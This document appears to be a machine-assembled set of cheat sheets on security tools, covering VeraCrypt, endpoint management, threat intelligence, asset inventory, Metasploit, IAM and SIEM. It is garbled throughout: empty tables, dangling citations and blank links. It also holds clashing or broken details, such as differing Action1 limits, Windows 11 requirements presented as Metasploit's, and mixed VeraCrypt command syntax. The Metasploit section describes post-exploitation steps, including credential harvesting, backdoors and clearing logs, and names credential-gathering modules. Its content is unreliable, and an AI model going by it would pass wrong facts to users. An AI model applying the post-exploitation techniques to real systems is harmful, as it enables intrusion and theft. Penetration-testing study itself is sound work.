  • Command-Line Support: Enables scripting and automation for advanced users.

  • Latest Version: As of May 30, 2025, the latest stable release is 1.26.24 .


Installation Procedures

Windows

  1. Download the .exe installer from the .

  2. Run the installer, accept the license, choose the installation directory, and follow prompts.

  3. Launch VeraCrypt from the Start Menu or desktop shortcut .

macOS

  1. Download the .dmg file.

  2. Open and mount the disk image, then drag VeraCrypt to the Applications folder.

  3. Authorize the app in Security & Privacy settings if prompted.

Linux

  • Debian/Ubuntu: sudo dpkg -i veracrypt-setup.deb

  • Red Hat/Fedora: sudo rpm -ivh veracrypt-setup.rpm

  • From Source: Extract the source, then follow the build instructions in the README.


Encryption Algorithms & Volume Types

Encryption Algorithms

  • 15 algorithms and 5 hash functions (75 combinations).

  • Default: AES-256 with SHA-512.

  • Other options: Serpent, Twofish, Camellia, Kuznyechik, and combinations .

Container Types

  • File Containers: Encrypted volumes stored as files; portable and flexible.

  • Device-Hosted Volumes: Encrypts entire partitions or drives for higher security .


Creating & Mounting Volumes

Creating a Volume

  1. Launch VeraCrypt and click "Create Volume".

  2. Select Volume Type: Standard or Hidden.

  3. Specify Location: Choose file path (for file containers) or device/partition.

  4. Choose Algorithms: Select encryption and hash algorithms (default is safe).

  5. Set Size: Define the container size.

  6. Set Password: Use a strong, unique password.

  7. Generate Randomness: Move your mouse randomly in the window to increase cryptographic strength.

  8. Format & Create: Complete the process to create the encrypted volume .

Mounting a Volume

  1. Open VeraCrypt.

  2. Select a drive letter.

  3. Click "Select File" or "Select Device" and choose your volume.

  4. Click "Mount" and enter your password.


Command-Line Usage & Automation

  • CLI Benefits: Faster, scriptable, and resource-efficient .

  • Mount a Volume: veracrypt /path/to/container /letter /p password

  • Dismount a Volume: veracrypt /d /letter

  • Create a Volume (Wizard): veracrypt --create

  • Automate Tasks: Use batch files or shell scripts to mount/dismount volumes at login, backup, or shutdown .


Security Best Practices

  • Use Strong Passwords: For both outer and hidden volumes .

  • Keep VeraCrypt Updated: Regularly check for updates and apply them.

  • Backup Data: Always keep backups of important data and rescue disks.

  • Protect Hidden Volumes: Enable "Protect hidden volume against damage" when mounting the outer volume .

  • Understand Your Threat Model: Know your risks and plan accordingly.


Hidden Volumes & Plausible Deniability

Hidden Volumes

  • Purpose: Conceal sensitive data within an outer volume.

  • Creation: During volume creation, select "Hidden VeraCrypt volume".

  • Protection: When mounting the outer volume, enable protection for the hidden volume by entering both passwords .

Plausible Deniability

  • How It Works: Hidden volumes are indistinguishable from random data; adversaries cannot prove their existence .

  • Limitations: Not foolproof—coercion or legal requirements may still pose risks .

  • Best Use: In situations where you may be forced to reveal a password, but need to keep some data secret .


Troubleshooting Common Issues

  1. Identify the Problem: Note error messages and recent changes .

  2. Basic Checks: Ensure all connections and power sources are secure .

  3. Research: Use forums and online resources for similar issues .

  4. Divide and Conquer: Test individual settings and configurations .

  5. Test Solutions: Try one fix at a time and document results .

  6. Use Diagnostic Tools: Leverage VeraCrypt’s built-in tools and logs .

  7. Seek Help: Don’t hesitate to ask in forums or communities .

  8. Prevent Recurrence: Update software and follow best practices .


Real-World Use Cases

  • Data Security for Professionals: Healthcare, finance, and legal sectors use VeraCrypt to protect sensitive data.

  • Fraud Prevention: Encrypts transaction data in financial services.

  • Secure Data Sharing: Encrypt files before sharing via USB or email.

  • Regulatory Compliance: Helps meet GDPR and other data protection requirements.

  • Personal Privacy: Protects personal files and sensitive information on laptops and USB drives.

  • Integration: Can be used alongside firewalls and intrusion detection systems for comprehensive security .


Cheat Sheet: Quick Commands & Shortcuts

VeraCrypt GUI Shortcuts

  • Mount Volume: Select drive letter → Select File/Device → Mount

  • Dismount Volume: Select mounted volume → Dismount

  • Create Volume: Tools → Volume Creation Wizard

Command-Line (CLI)

  • Mount Volume: veracrypt /path/to/container /letter /p password

  • Dismount Volume: veracrypt /d /letter

  • Create Volume: veracrypt --create

  • List Mounted Volumes: veracrypt --list

  • Dismount All: veracrypt -d

General Keyboard Shortcuts (Windows)

  • Ctrl + C/V/X/Z: Copy/Paste/Cut/Undo

  • Alt + Tab: Switch between open applications

  • Windows Key + D: Show desktop

  • Ctrl + Shift + Esc: Open Task Manager

Efficiency Tips

  • Automate Mounting: Use scripts to mount volumes at startup.

  • Batch Processing: Use batch files for repetitive tasks.

  • Use Strong Passwords: Combine upper/lowercase, numbers, and symbols.


Additional Resources


By following this guide and referencing the cheat sheet, you can maximize your use of VeraCrypt for both personal and professional data security needs. Always stay updated and practice good security hygiene for optimal protection.

Free Endpoint Management

Comprehensive Summary & Cheat Sheet: Free Endpoint Management Tools

This guide provides a detailed overview of free endpoint management tools, including their core features, user reviews, and compatibility with different operating systems (Windows, macOS, Linux/Unix, and cross-platform). It also highlights security, patch management, compliance, deployment, and remote monitoring capabilities.


1. Windows Endpoint Management Tools

ManageEngine Endpoint Central (Free Edition)

  • Core Features: Asset management, software deployment, patch management, remote control, mobile device management, compliance reporting, and vulnerability management.

  • User Reviews: Highly regarded for its user-friendly interface and robust feature set. Popular among IT professionals for its comprehensive management capabilities .

  • Limitations: Free version may have restrictions on the number of endpoints or features compared to paid tiers.

Action1 (Free for up to 100 endpoints)

  • Core Features: Automated patch management (OS and third-party apps), remote access, vulnerability scanning, scripting, automation, and reporting.

  • Security & Compliance: Automated vulnerability remediation, real-time compliance reports, and secure remote connections without extra software .

  • User Reviews: Praised for ease of use and comprehensive features at no cost for small environments .

OCS Inventory NG

  • Core Features: Open-source inventory management, software deployment, and network monitoring.

  • User Reviews: Powerful for large device inventories, but documentation and UI could be improved .

Lansweeper (Free for up to 100 devices)

  • Core Features: Asset management, network scanning, software inventory.

  • User Reviews: Cost-effective for SMBs, with a good balance of features and usability .


2. macOS Endpoint Management Tools

NinjaOne MDM for macOS

  • Core Features: Automated endpoint management, device deployment, real-time compliance checks.

  • User Reviews: Noted for seamless Mac management and automation .

Jamf (Free trial available)

  • Core Features: Deep integration with Apple’s security framework, same-day support for new Apple releases, robust device management.

  • User Reviews: Industry standard for Apple device management, highly recommended for macOS environments .

ESET Endpoint Security for macOS

  • Core Features: Cross-platform threat detection (including Windows threats on Mac), malware protection.

  • User Reviews: Valued for its security focus in mixed-OS environments .

Microsoft Intune (Free trial)

  • Core Features: Unified endpoint management for macOS, Windows, iOS, and Android; mobile application management; compliance controls.

  • User Reviews: Praised for integration with Microsoft ecosystem and cross-platform support .


3. Linux/Unix Endpoint Management Tools

osquery

  • Core Features: Query Linux systems using SQL-like syntax for real-time visibility, configuration monitoring, and anomaly detection.

  • User Reviews: Highly flexible and powerful for system monitoring and security .

Infection Monkey

  • Core Features: Open-source breach and attack simulation tool, tests network resilience, identifies vulnerabilities.

  • User Reviews: Useful for security assessments and penetration testing .

SaltStack

  • Core Features: Configuration management, remote execution, orchestration, automation for Linux endpoints.

  • User Reviews: Known for scalability and flexibility in managing large Linux environments.


4. Cross-Platform Endpoint Management Tools

Bacon Unlimited

  • Core Features: Unified management for Windows, macOS, and Linux; policy enforcement; performance monitoring; security management.

  • User Reviews: Appreciated for its centralized dashboard and ability to manage diverse device types .

Scalefusion UEM

  • Core Features: Supports Android, Windows, iOS, macOS, Linux, ChromeOS; zero-trust access; device security; policy enforcement.

  • User Reviews: Valued for its broad OS support and unified management .

FileWave

  • Core Features: Multi-OS support (macOS, Windows, iOS, Chrome OS, Android); asset management; software deployment.

  • User Reviews: Versatile for organizations with mixed device environments .


5. Remote Monitoring & Management (RMM) Tools

Action1

  • Core Features: Free patching, automation, reporting for up to 200 agents; remote access; asset management.

  • User Reviews: Strong for SMBs, easy to use, and feature-rich .

Pandora FMS

  • Core Features: Free monitoring, alerting, reporting; no trial required.

  • User Reviews: Robust monitoring solution for those seeking a no-cost option.

TeamViewer RMM (Free for personal use)

  • Core Features: Proactive monitoring, asset tracking, patching, secure remote support.

  • User Reviews: Trusted for remote support and monitoring .

AweSun

  • Core Features: Remote desktop for Windows, iOS, Android; essential management features.

  • User Reviews: Good alternative to TeamViewer for small-scale use .


6. Security, Patch Management, and Compliance

  • Automated Patch Management: Action1, ManageEngine Endpoint Central, and SuperOps offer automated patch deployment for OS and third-party apps, reducing vulnerability windows .

  • Security Features: Most tools provide antivirus management, firewall monitoring, and intrusion detection. Some, like CrowdStrike, focus on risk-based patching and compliance .

  • Compliance Tools: Real-time compliance reporting, vulnerability management, and policy enforcement are standard in leading free tools .


7. Deployment, System Requirements, and Scalability

  • Deployment Methods: Most tools support cloud-based, on-premises, or hybrid deployments. Blue-green, canary, and rolling deployments are common strategies for minimizing downtime .

  • System Requirements: Vary by tool, but many support both vertical (hardware upgrades) and horizontal (adding more machines) scaling .

  • Scalability: Tools like SaltStack and cross-platform UEMs are designed to scale with organizational growth, supporting microservices and load balancing for large environments .


8. Community Reviews & Feedback

  • Ease of Use: Tools like Action1 and ManageEngine Endpoint Central are praised for their intuitive interfaces.

  • Support Quality: Community feedback highlights the importance of responsive support, especially for open-source tools.

  • Feature Set: Users value comprehensive features in free tiers, though some note limitations in scalability or advanced functions compared to paid versions .


Cheat Sheet: Quick Reference Table

Tool Name
OS Support
Core Features
Free Tier Limitations
Notable Reviews/Feedback

Summary

Free endpoint management tools offer a wide range of features for organizations of all sizes and across all major operating systems. While free tiers may have limitations, they provide essential capabilities such as patch management, remote monitoring, compliance, and security. For mixed-OS environments, cross-platform tools like Bacon Unlimited, Scalefusion, and FileWave are highly recommended. For Windows, Action1 and ManageEngine Endpoint Central stand out, while Jamf and NinjaOne are top choices for macOS, and osquery and SaltStack excel on Linux/Unix. Community feedback consistently values ease of use, comprehensive features, and responsive support in these tools .

For best results, select a tool that matches your environment’s OS mix, required features, and scalability needs. Consider starting with a free tier and evaluating community feedback to ensure the tool aligns with your operational requirements.

Free Threat Intel

Comprehensive Summary & Cheat Sheet: Free Threat Intelligence Platforms & Vulnerability Databases

This guide provides a detailed overview and quick-reference cheat sheet for major free threat intelligence platforms—including GreyNoise—and free vulnerability databases maintained by organizations such as the FBI, CISA, and MITRE. It covers platform features, integration capabilities, and technical standards to help you leverage these resources for cybersecurity operations.


1. Free Threat Intelligence Platforms

1.1 GreyNoise

  • Purpose: Filters out internet background noise to help security teams focus on real threats.

  • Key Features:

    • Real-time intelligence on mass internet scan and attack activity.

    • NOISE and RIOT databases for tagging threats and labeling common business services.

    • Reduces alert volume by ~25% by filtering benign internet noise.

    • Out-of-the-box integrations with SIEM, SOAR, TIP, and other security tools.

    • Community API (free): Basic IP lookups to check if an IP is associated with known noise or malicious activity.

    • Research Community Program: Free, non-commercial access to premium features for students, educators, and researchers.

    • No setup fees for free or paid tiers .


1.2 Malware Information Sharing Platform (MISP)

  • Purpose: Open-source platform for sharing structured threat intelligence.

  • Key Features:

    • Supports data models, threat feeds, event management, and sharing.

    • Automatic correlation of attributes and indicators.

    • Exports in XML, JSON, OpenIOC, STIX formats for interoperability.

    • Enhances detection and response through collaborative intelligence sharing .


1.3 AlienVault Open Threat Exchange (OTX)

  • Purpose: Collaborative platform for real-time threat intelligence sharing.

  • Key Features:

    • Pulse system for detailed threat reports (IOCs, references).

    • Continuously updated with latest malware, vulnerabilities, and threat data.

    • Fosters community-driven threat awareness and response .


1.4 Open Cyber Threat Intelligence Platform (OpenCTI)

  • Purpose: Manages and analyzes threat intelligence from multiple sources.

  • Key Features:

    • Unified framework for storing, organizing, and correlating threat knowledge.

    • Supports STIX and TAXII standards for data sharing.

    • Facilitates integration with other platforms and tools .


1.5 Yeti

  • Purpose: Organizes observables, IOCs, and threats for actionable intelligence.

  • Key Features:

    • Collaborative environment for analysts.

    • Automated imports from various feeds.

    • Robust API for automation and customization .


1.6 Cuckoo Sandbox

  • Purpose: Malware analysis and reporting in a sandboxed environment.

  • Key Features:

    • Analyzes multiple file types (DLL, PDF, Office, URLs, etc.).

    • Generates detailed behavioral reports for suspicious files .


2. Free Vulnerability Databases by Major Organizations

2.1 CISA (Cybersecurity and Infrastructure Security Agency)

  • Known Exploited Vulnerabilities (KEV) Catalog:

    • Regularly updated list of vulnerabilities actively exploited in the wild.

    • As of June 2023, included 896 high-risk vulnerabilities.

    • Focuses on widely used systems (Windows, macOS, Linux).

  • Coordinated Vulnerability Disclosure (CVD) Program:

    • Collects and validates vulnerability reports from public and internal sources.

    • In FY24, coordinated 845 cases and produced 427 advisories.

  • Risk and Vulnerability Assessment (RVA):

    • One-on-one engagements to identify and mitigate organizational weaknesses.

  • Public Tools:

    • Open-source tools (e.g., Anchore) to check environments for KEV-listed vulnerabilities .


2.2 MITRE

  • Common Vulnerabilities and Exposures (CVE) Program:

    • Standardized identifiers for publicly disclosed vulnerabilities.

    • Managed by MITRE, sponsored by DHS/CISA.

    • CVE List is a global reference for vulnerability management .

  • MITRE ATT&CK Framework:

    • Knowledge base of adversary tactics and techniques.

    • Used for threat modeling, detection, and response.

  • MITRE-Cyber-Security-CVE-Database (2025):

    • Aggregates CVE data from MITRE, NVD, CISA KEV, CVEDetails, Tenable, and more.

    • Open-source, supports community contributions, and automated updates.

    • Data available in JSON for easy integration .


2.3 FBI

  • Role: Primarily focused on cybercrime investigation, intelligence sharing, and response.

  • Key Resources:

    • Internet Crime Complaint Center (IC3): Collects public reports of internet crime.

    • National Cyber Investigative Joint Task Force (NCIJTF): Multi-agency task force for cyber threat response.

    • CyWatch: 24/7 operations center for incident tracking and communication.

    • Asset Forfeiture Program: Seizes assets from cybercriminals and compensates victims.

  • Vulnerability Database: The FBI does not maintain a public vulnerability database but collaborates with CISA and other agencies for alerts and advisories .


3. Integration Capabilities & Technical Standards

  • APIs: Most platforms (including GreyNoise, MISP, OpenCTI) offer APIs for integration with SIEM, SOAR, TIP, and other security tools.

  • STIX/TAXII Support:

    • STIX: Structured language for describing cyber threats (STIX 2.x uses JSON; STIX 1.x uses XML).

    • TAXII: Protocol for secure, automated exchange of threat intelligence.

    • Widely supported by platforms for interoperability and automated sharing .

  • SIEM Integration: Platforms can feed threat intelligence and vulnerability data into SIEMs for real-time alerting and correlation.

  • DevSecOps Integration: Tools can be embedded in CI/CD pipelines for automated vulnerability detection .


4. Quick-Reference Cheat Sheet

Platform/Database
Type
Free Tier/Access
Key Features/Notes

5. How to Use These Resources

  • Threat Detection: Integrate threat intelligence feeds (GreyNoise, MISP, OTX) into your SIEM/SOAR for real-time alerting and context enrichment.

  • Vulnerability Management: Regularly consult CISA KEV, MITRE CVE, and MITRE-Cyber-Security-CVE-Database to prioritize patching and remediation.

  • Incident Response: Use FBI advisories and IC3 for reporting and understanding current cybercrime trends.

  • Automation: Leverage APIs and STIX/TAXII support for automated data ingestion and sharing across your security stack.

  • Research & Collaboration: Participate in community programs (e.g., GreyNoise Research Community) and contribute to open-source platforms for collective defense.


This summary and cheat sheet should equip you with a comprehensive understanding of the leading free threat intelligence platforms and vulnerability databases, along with practical guidance for integration and operational use.

Free IT Asset Inventory

Comprehensive Summary & Cheat Sheet: Free IT Asset Inventory Tools

This guide provides a detailed overview and quick-reference cheat sheet for the most popular free IT Asset Inventory management tools. It covers key features, technical specifications, deployment methods, integration capabilities, limitations, user feedback, and best practices for implementation.


1. Popular Free IT Asset Inventory Tools

Tool
Type
Best For
Free Plan/License

2. Key Features & Capabilities

Tool
Asset Discovery
Inventory Mgmt
Reporting
Alerts/Notifications
User Mgmt
API/Integration
  • Asset Discovery: Most tools support both manual entry/import and automated network scanning.

  • Inventory Management: All tools provide detailed tracking of hardware and software assets.

  • Reporting: Standard and custom reports are available in most tools.

  • Alerts/Notifications: Most tools can send alerts for asset changes, maintenance, or policy violations.

  • User Management: Role-based access control is common.

  • API/Integration: Open-source tools like Snipe-IT, GLPI, and Ralph 3 offer robust API support for integration with other systems .


3. Deployment Methods & System Requirements

  • Cloud-Based: AssetTiger, Spiceworks (cloud version)

  • On-Premises/Self-Hosted: Snipe-IT, GLPI, Ralph 3, Open-AudIT, OCS Inventory NG, CMDBuild

  • Hybrid: Some tools offer both cloud and on-premises options.

System Requirements:

  • Vary by tool, but most require a modern server (8+ CPU cores, 32+ GB RAM for larger deployments), and support Windows, Linux, and sometimes macOS.

  • All nodes in a deployment should run the same OS version for compatibility .


4. Integration Capabilities

  • APIs: Snipe-IT, GLPI, Ralph 3, and others provide REST APIs for integration with ITSM tools (e.g., ServiceNow, Jira).

  • Middleware & Data Export/Import: Most tools support CSV/XML export/import and can be integrated via middleware or custom scripts.

  • Cloud & Virtualization: Many tools can be deployed on virtual machines or cloud platforms (AWS, Azure) .


5. Limitations & Community Feedback

  • AssetTiger: Free plan limited to 250 assets; advanced features may require paid plans.

  • Snipe-IT: Requires self-hosting and technical setup; cloud hosting is paid.

  • Spiceworks: Some users report performance issues with large inventories; ad-supported.

  • GLPI: Can be complex to configure for advanced use cases.

  • Open-AudIT/OCS Inventory: Community editions may lack some enterprise features; setup can be technical.

User Reviews:

  • Online reviews and forums are critical for understanding real-world performance and limitations.

  • Community support is strong for open-source tools, with active forums and documentation .


6. Best Practices & Implementation Strategies

  • Organizational Assessment: Evaluate readiness, resources, and support before implementation.

  • Clear Specification: Define objectives, actors, and expected outcomes for asset management.

  • Automation: Use automated discovery and reporting where possible to reduce manual effort.

  • Integration: Leverage APIs and middleware for seamless integration with existing IT systems.

  • Continuous Feedback: Gather user feedback through surveys, forums, and direct engagement to improve processes.

  • Security & Compliance: Ensure deployments meet security standards and compliance requirements .


7. Common Use Cases

  • Compliance Audits: Track and report on software/hardware for regulatory compliance.

  • Lifecycle Management: Monitor asset acquisition, usage, maintenance, and disposal.

  • License Management: Track software licenses and renewals.

  • Incident Response: Quickly identify affected assets during security incidents.


8. Quick Reference Cheat Sheet

Tool
Free Limitations
Best For
Deployment
API/Integration
Community Support

9. Implementation Tips

  • Start Small: Pilot with a subset of assets before full rollout.

  • Document Everything: Keep clear records of configurations, integrations, and processes.

  • Train Users: Ensure staff are trained on tool usage and best practices.

  • Monitor & Iterate: Regularly review asset data and adjust processes as needed.


By leveraging these free IT Asset Inventory tools and following best practices, organizations can efficiently manage their IT assets, ensure compliance, and optimize resource utilization without significant financial investment.

Metasploit

Comprehensive Guide and Cheat Sheet for Metasploit

Metasploit is a powerful, modular penetration testing framework widely used by security professionals for vulnerability assessment, exploitation, and post-exploitation activities. This guide provides a thorough overview, practical cheat sheet, and essential best practices for using Metasploit effectively and ethically.


Introduction to Metasploit

Metasploit is an open-source penetration testing framework that enables security professionals to identify, exploit, and validate vulnerabilities in systems and applications. It is modular, extensible, and supports a wide range of exploits, payloads, and post-exploitation tools. Metasploit is used for:

  • Penetration testing

  • Security research

  • Vulnerability validation

  • Red teaming and adversary simulation


Installation and Setup

System Requirements

  • Windows 11: 1 GHz+ CPU (2+ cores), 4 GB RAM, 64 GB storage, UEFI, Secure Boot, TPM 2.0, DirectX 12+ support, HD display .

  • Linux: Most modern distributions are supported; ensure you have root privileges and sufficient resources.

  • macOS: Supported, but some features may be limited.

Installation Steps

On Linux (Kali, Ubuntu, etc.)

On Windows

  • Download the installer from the .

  • Run the installer and follow the prompts.

Initial Setup

  • Launch msfconsole from your terminal or command prompt.

  • Initialize the database with msfdb init (if not already done).

  • Update modules: msfupdate.


Architecture and Components

Metasploit is built around a modular, client-server architecture:

  • msfconsole: The main command-line interface for interacting with Metasploit.

  • Module System: Organizes exploits, payloads, auxiliary, encoders, and post-exploitation modules.

  • REX Library: Handles networking and exploitation primitives.

  • Framework Core: The API that connects components and manages module execution.

  • msfdb: PostgreSQL database for storing scan results, credentials, and host data .


Core Commands and Usage Patterns

Basic Commands

Command
Description

Example Usage Pattern:


Modules: Exploits, Payloads, Auxiliary, and Post

Exploits

  • Target specific vulnerabilities (e.g., buffer overflows, web app flaws).

  • Can be automated or manual, depending on the level of control required .

Payloads

  • Single (Inline): Self-contained, includes exploit and shellcode .

  • Staged: Delivered in parts; stager sets up connection, stage delivers payload.

  • Stage-less: All-in-one, no further communication needed .

  • Meterpreter: Advanced, in-memory, interactive shell with encrypted comms .

  • Shell: Basic command shell.

  • Bind Shell: Target listens for attacker connection .

  • Reverse Shell: Target connects back to attacker (bypasses firewalls) .

Auxiliary Modules

  • Scanning, fuzzing, and other non-exploit tasks.

Encoders

  • Obfuscate payloads to evade detection.

Post-Exploitation Modules

  • Gather credentials, enumerate applications, escalate privileges, and more .


Post-Exploitation Techniques

After gaining access, Metasploit offers a suite of post-exploitation tools:

  • Session Management: Interact with and manage multiple sessions.

  • Pivoting: Route traffic through compromised hosts to access internal networks.

  • Credential Harvesting: Extract stored credentials from browsers, applications, and the OS.

  • Application Enumeration: List installed software for further exploitation.

  • Packet Sniffing: Capture network traffic for sensitive data.

  • Backdoors: Establish persistent access.

  • Covering Tracks: Clear logs and edit registries to evade detection .

Example Post-Exploitation Modules:

  • post/windows/gather/credentials/aim

  • post/windows/gather/enum_chrome

  • post/windows/gather/enum_applications

  • post/windows/gather/credentials/gpp (Group Policy Preferences credentials)


Real-World Usage Scenarios

Metasploit is used in a variety of real-world contexts:

  • Penetration Testing: Simulate attacks to assess organizational security.

  • Red Team Operations: Emulate advanced persistent threats (APTs).

  • Security Research: Develop and test new exploits and payloads.

  • Incident Response: Validate and reproduce attack vectors during investigations.

Case studies and practical examples can be found in community forums, security conference presentations, and open-source documentation .


Security, Ethics, and Legal Guidelines

Security Best Practices

  • Data Privacy: Minimize data collection, encrypt sensitive data, control access, and conduct regular audits .

  • Cyber Hygiene: Keep software updated, use strong passwords, and enable multi-factor authentication .

Ethical Considerations

  • Respect Privacy: Only test systems you own or have explicit permission to assess.

  • Transparency: Inform stakeholders and obtain consent before testing.

  • Accountability: Document actions and findings responsibly .

Legal Usage

  • Compliance: Adhere to laws such as GDPR, CCPA, and local regulations .

  • Professional Codes: Follow the ACM Code of Ethics and similar frameworks .

  • Authorization: Never use Metasploit on unauthorized systems.


Community Resources and Learning Materials

  • Official Documentation:

  • GitHub Repository:

  • Online Courses: Udemy, Coursera, Pluralsight

  • YouTube Tutorials: Search for "Metasploit tutorial" for hands-on walkthroughs

  • Forums: Reddit r/netsec, Stack Overflow, Rapid7 Community

  • Books: "Metasploit: The Penetration Tester’s Guide" by David Kennedy et al.


Quick Reference Cheat Sheet

Common Commands

Command
Description

Module Types

  • exploit/: Vulnerability exploitation modules

  • payload/: Code executed after exploitation

  • auxiliary/: Scanners, fuzzers, etc.

  • post/: Post-exploitation actions

  • encoder/: Payload obfuscation

  • nop/: No-operation generators

Example Workflow


Conclusion

Metasploit is a versatile and essential tool for penetration testers and security researchers. Mastery of its architecture, modules, and ethical usage is crucial for effective and responsible security testing. Always ensure you have proper authorization and adhere to legal and ethical standards when using Metasploit.


For further learning, consult the official documentation, participate in community forums, and practice in safe, legal environments such as penetration testing labs or virtual machines.

Free IAM

Comprehensive Summary & Cheat Sheet: Free Identity and Access Management (IAM) Tools

This guide provides a detailed overview and quick-reference cheat sheet for popular free IAM tools, including their features, capabilities, limitations, deployment options, integration, security standards, and user feedback.


1. Popular Free IAM Tools

Tool
Description
Typical Use Cases

2. Core Features & Capabilities

  • Authentication & Authorization: All tools provide basic authentication (verifying user identity) and authorization (controlling access to resources) .

  • User Management: Support for user creation, modification, deactivation, and deletion.

  • Access Control: Centralized management of permissions and roles (RBAC/ABAC).

  • Multi-Factor Authentication (MFA): Most tools support MFA, including OTP, TOTP, and integration with external authenticators .

  • Single Sign-On (SSO): SSO across multiple applications is a standard feature .

  • Integration: Support for standard protocols (SAML, OAuth2, OpenID Connect, LDAP, RADIUS, etc.) for easy integration with other systems .

  • Audit Logging: Basic logging and reporting for compliance and monitoring .


3. Authentication Methods Supported

Tool
MFA
SSO
Biometric Support
  • MFA: Most tools support TOTP, SMS, email, and integration with hardware tokens.

  • SSO: All tools support SSO via SAML, OIDC, or OAuth2.

  • Biometric: Generally not native; can be integrated via external providers or plugins .


4. Integration Capabilities

  • Protocols Supported: SAML, OAuth2, OpenID Connect, LDAP, RADIUS, Kerberos .

  • System Integration: Can connect with cloud apps (Google Workspace, Office 365), on-premise directories (Active Directory, LDAP), and custom apps.

  • Federation: Shibboleth and KeyCloak excel at federated identity (cross-organization SSO) .


5. Security Standards & Compliance

  • ISO 27001: Tools can help support compliance by enforcing access controls and audit trails .

  • GDPR, HIPAA, PCI DSS: Support for strong authentication, least privilege, and audit logging aids compliance .

  • NIST SP 800-63: Alignment with digital identity guidelines for authentication and lifecycle management .

  • Best Practices:

    • Zero Trust: Continuous verification of access requests.

    • Role/Attribute-Based Access Control: Fine-grained permissions .

    • Continuous Monitoring: Audit logs and real-time alerts .

    • SSO & Federation: Simplifies access and trust management .


6. Deployment Options & System Requirements

Tool
Cloud
On-Premise
Hybrid
System Requirements
  • Cloud: Most tools can be deployed on cloud infrastructure (AWS, Azure, GCP) or as managed services .

  • On-Premise: Full control, but requires local servers and IT resources .

  • Hybrid: Combine on-premise and cloud for flexibility and scalability .


7. Limitations of Free IAM Tools

  • Feature Set: Free versions may lack advanced features (e.g., advanced analytics, deep customization) found in paid solutions.

  • Scalability: May not scale as efficiently for very large organizations.

  • Support: Community-based support; no guaranteed SLAs.

  • Compliance: May require additional configuration to meet strict regulatory requirements .


8. User Reviews & Community Feedback

  • Gartner Peer Insights: Real user reviews for tools like AWS IAM, KeyCloak, and others .

  • Community Forums: Active open-source communities for troubleshooting and feature requests.

  • Tech Blogs: Practical guides and user experiences are widely shared, especially for KeyCloak and Shibboleth.


9. Best Practices for Using Free IAM Tools

  • Implement MFA and SSO wherever possible for enhanced security and user convenience.

  • Regularly audit user access and permissions to maintain least privilege.

  • Integrate with existing directories and cloud services for centralized management.

  • Stay updated with security patches and community releases.

  • Document your IAM architecture and policies for compliance and troubleshooting.


10. Quick Reference Table

Tool
SSO
MFA
Federation
Cloud
On-Prem
Hybrid
Protocols Supported
Community Support

Summary

Free IAM tools like KeyCloak, MidPoint, OpenIAM, Shibboleth, FusionAuth, and Syncope offer robust identity and access management features suitable for small to medium organizations, developers, and academic institutions. They support essential capabilities such as SSO, MFA, user management, and integration with standard protocols. While they may lack some advanced features and enterprise-grade support, their open-source nature, flexibility, and active communities make them a strong choice for organizations seeking cost-effective IAM solutions. Careful consideration of deployment, integration, and compliance needs is essential to maximize their value and security .


Tip: For the latest user experiences and troubleshooting, consult community forums, GitHub repositories, and peer review platforms. Always test IAM tools in a controlled environment before full-scale deployment.

Free SIEM

Comprehensive Summary & Cheat Sheet: Free SIEM Cyber Tools

This guide provides a detailed overview and quick-reference cheat sheet for the most popular free and open-source SIEM (Security Information and Event Management) tools. It covers core functionalities, technical features, integration and deployment considerations, limitations, and user/community reviews.


1. Wazuh

Overview: Wazuh is a widely adopted open-source SIEM platform built on the Elastic Stack. It offers comprehensive security monitoring, log analysis, intrusion detection, and compliance management.

Core Functionality:

  • Log data collection and analysis from endpoints, servers, and cloud environments

  • Real-time threat detection and alerting

  • File integrity monitoring and vulnerability detection

  • Compliance reporting (PCI DSS, GDPR, HIPAA, etc.)

  • Integration with Elastic Stack for advanced search and visualization

Technical Features:

  • Agent-based and agentless monitoring

  • Scalable architecture suitable for small to large deployments

  • RESTful API for integrations

  • Supports Windows, Linux, macOS, and cloud platforms

Integration & Deployment:

  • Integrates natively with Elastic Stack (Elasticsearch, Logstash, Kibana)

  • Can be deployed on-premises or in the cloud

  • Extensive documentation and active community support

Limitations:

  • Requires tuning to reduce false positives

  • Advanced features (e.g., machine learning) may require additional configuration

User Reviews:

  • Highly rated for ease of use and flexibility

  • Praised for strong community support and frequent updates

  • Some users note a learning curve for advanced configurations .


2. Security Onion

Overview: Security Onion is a Linux distribution designed for network security monitoring, intrusion detection, and log management. It bundles several open-source tools, including Wazuh, Snort, Suricata, and Zeek.

Core Functionality:

  • Network traffic analysis and full packet capture

  • Host and network intrusion detection

  • Log management and correlation

  • Security event visualization and alerting

Technical Features:

  • Pre-configured with multiple security tools

  • Web-based dashboards for analysis (Kibana, Squert, etc.)

  • Scalable for enterprise environments

Integration & Deployment:

  • Easy deployment as a standalone appliance or distributed cluster

  • Integrates with a wide range of network and endpoint sensors

Limitations:

  • Resource-intensive; best suited for dedicated hardware or VMs

  • Complexity increases with scale

User Reviews:

  • Valued for its all-in-one approach and ease of deployment

  • Community is active and responsive

  • Some users report a steep learning curve for new users .


3. OSSEC

Overview: OSSEC is a host-based intrusion detection system (HIDS) that provides log analysis, file integrity checking, and rootkit detection. It is often used as a component in larger SIEM solutions.

Core Functionality:

  • Log monitoring and analysis

  • File integrity checking

  • Rootkit and malware detection

  • Real-time alerting

Technical Features:

  • Lightweight agent for endpoints

  • Supports Windows, Linux, macOS, and Unix

  • Centralized management server

Integration & Deployment:

  • Can be integrated with other SIEM tools (e.g., Wazuh, ELK)

  • Simple deployment for small to medium environments

Limitations:

  • Primarily focused on host-based monitoring

  • Lacks advanced correlation and visualization features out-of-the-box

User Reviews:

  • Praised for reliability and low resource usage

  • Users appreciate its simplicity and effectiveness for endpoint monitoring .


4. AlienVault OSSIM

Overview: OSSIM (Open Source Security Information Management) is the free version of AlienVault’s USM platform. It combines multiple open-source security tools for a unified SIEM solution.

Core Functionality:

  • Log management and correlation

  • Asset discovery and vulnerability assessment

  • Intrusion detection (network and host-based)

  • Event normalization and alerting

Technical Features:

  • Integrates tools like Snort, OpenVAS, and OSSEC

  • Web-based management interface

  • Supports plugins for various data sources

Integration & Deployment:

  • Suitable for small to medium organizations

  • Requires dedicated server or VM

  • Good documentation and community support

Limitations:

  • Fewer features than the commercial USM version

  • Can be complex to configure and maintain

User Reviews:

  • Appreciated for its comprehensive feature set in a free package

  • Some users report performance issues at scale and a steeper learning curve .


5. ELK Stack (Elasticsearch, Logstash, Kibana)

Overview: The ELK Stack is not a SIEM by default but is widely used as a foundation for custom SIEM solutions due to its powerful log management and visualization capabilities.

Core Functionality:

  • Centralized log collection and storage (Elasticsearch)

  • Log parsing and transformation (Logstash)

